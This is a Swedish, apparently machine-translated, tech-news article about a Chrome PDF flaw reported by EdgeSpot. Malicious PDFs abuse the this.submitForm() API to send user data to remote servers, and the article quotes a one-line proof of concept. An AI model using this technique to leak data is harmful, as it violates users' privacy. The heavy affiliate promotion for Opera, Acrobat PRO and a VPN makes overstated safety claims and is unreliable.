webbläsare

Chrome bug låter hackare samla in användardata via PDF-filer

Chrome bug låter hackare samla in användardata via PDF-filer

Utnyttjandetjänst EdgeSpot upptäckte en spännande Chrome-nolldagars sårbarhet som utnyttjar PDF-dokument.

Sårbarheten tillåter angripare att skörda känslig data med skadliga PDF-dokument som öppnas i Chrome. 

Så snart offret öppnar respektive PDF-filer i Google Chrome börjar ett skadligt program arbeta i bakgrunden genom att samla in användardata.

Uppgifterna vidarebefordras sedan till fjärrservern som kontrolleras av hackarna. Du kanske undrar vilken data som sugs av angriparna, de riktar sig mot följande data på din dator:

Akta dig för skadade PDF-filer

Experter upptäckte att en av de två domänerna readnotify [.] com eller burpcollaborator [.] net fick data.

De avslöjade att angriparna använder this.submitForm () PDF Javascript API för att samla in känslig information från användarna.

Vi testade det med en minimal PoC, ett enkelt API-samtal som this.submitForm ('http://google.com/test') får Google Chrome att skicka personuppgifter till google.com.

Denna Chrome-bugg utnyttjades av två olika uppsättningar av skadliga PDF-filer, som båda cirkulerades i oktober 2017 respektive september 2018.

Speciellt kan insamlade data användas av angriparna för att finjustera attacker i framtiden. Rapporter tyder på att den första satsen filer sammanställdes med ReadNotifys PDF-spårningstjänst.

Användare kan använda tjänsten för att hålla reda på användarvyerna. EdgeSpot har inte delat några detaljer om typen av den andra uppsättningen PDF-filer.

Snabbtips: Ändra din webbläsare till Opera

I dessa oroliga tider attackeras vi med skadlig kod, nätfiske och trojaner i varje steg så vi måste vara mycket mer vaksamma och hålla oss skyddade.

Och eftersom detta är ett specifikt problem för Chrome kan du undvika det hotet och alla andra med en säkerhetsinriktad webbläsare som Opera.

Denna webbläsare levereras med en inbyggd annonsblockerare som inte bara rensar sådana distraktioner utan också blockerar analysskript, spårningspixlar och metoder för att samla in dina data. 

Och om du vill vara helt säker på att du håller dig borta från någon fara, gå bakom den inbyggda VPN-tjänsten som är 100% gratis att använda i obegränsad tid.

Opera

Opera erbjuder det perfekta hotskyddet med den inbyggda ad-blockeraren och VPN-tjänsten gratis! Få det gratis Besök hemsida

Hur kan jag hålla mig skyddad från PDF-sårbarheter?

Ladda ner Adobe Acrobat PRO

Adobe och Chrome matchar bra när det gäller hantering av PDF-filer. Genom att installera Adobe Extension för Chrome kan du granska och manipulera PDF-filer efter eget tycke utan att lämna din favoritwebbläsare.

Trots sin robusta struktur kan skadlig programvara som är dold i PDF-filer kanske inte upptäckas om du använder standardversionen av Reader.

Den professionella versionen rekommenderas för att garantera ditt skydd och hålla dina data borta från hackare.

Även om det inte är gratis är priset du betalar ganska litet för överflödet av ytterligare funktioner du kommer att njuta av, inklusive den förbättrade säkerheten för dina PDF-filer.

Det ingår också en 7-dagars gratis provperiod så att du kan få en smakprov på hela Pro-upplevelsen innan du köper.

Adobe Acrobat PRO

Håll dig borta från skadlig programvara genom att ladda ner Adobe Acrobat PRO. Den har mycket mer funktion än den fria versionen och håller dina data säkra. Gratis provperiod Besök webbplats Läs mer

Om du vill vara säker när du surfar på internet måste du få ett helt dedikerat verktyg för att säkra ditt nätverk.  Installera privat internetåtkomst nu och säkra dig själv. Det skyddar din dator från attacker medan du surfar, maskerar din IP-adress och blockerar all oönskad åtkomst.

Exploitdetekteringstjänsten EdgeSpot ville varna Chrome-användarna om de potentiella riskerna eftersom plåstret inte förväntades släppas inom en snar framtid.

EdgeSpot rapporterade till Google om sårbarheten förra året och företaget lovade att släppa en patch i slutet av april.

Du kan dock överväga att använda en tillfällig lösning på problemet genom att lokalt visa de mottagna PDF-dokumenten med en annan läsarapp.

Alternativt kan du också öppna dina PDF-dokument i Chrome genom att koppla bort dina system från Internet.

FAQ: Läs mer om Chrome-tillägg

Ja det gör det. Men om du vill ha ett bredare urval, utforska våra toppval för Chrome-sekretessförlängningar i den här fullständiga guiden.

Det finns många tillägg som tillåter bearbetning av PDF-filer. Kolla in vår utmärkta guide om de bästa PDF-tilläggen för Chrome.

Det gör det inte men du kan aktivera det snabbt. Här är vår omfattande guide om hur du aktiverar QR-kodgeneratorn i Chrome.

Redaktörens anmärkning: Det här inlägget publicerades ursprungligen i april 2020 och har sedan uppdaterats och uppdaterats i augusti 2020 för friskhet, noggrannhet och omfattning.

fönster Köp Windows 8.1 till ett billigare pris Bästa erbjudanden och rabatter
Köp Windows 8.1 till ett billigare pris Bästa erbjudanden och rabatter
Om du vill spara några dollar med ditt Windows 8.1-köp, läs nedan för att ta reda på några billiga sätt att göra det Windows 8.1 är ute i naturen och...
fönster MSI lanserar Windows 8.1 allt-i-ett-datorer med skärmar för att minska ögonbelastningen
MSI lanserar Windows 8.1 allt-i-ett-datorer med skärmar för att minska ögonbelastningen
MSI har introducerat två nya Windows 8.1 allt-i-ett-datorer (AIO) som levereras med företagets Flicker-Free och Blue Light Control-teknik för att skyd...
fönster Den ironiska nästan utdöda, Windows XP SP2 är dyrare än Windows 8.1
Den ironiska nästan utdöda, Windows XP SP2 är dyrare än Windows 8.1
Du tror att sex månader innan vi äntligen kan börja gräva graven för Windows XP, skulle OS vara smutsigt billigt. Tja, vad sägs om detta - på Amazon ä...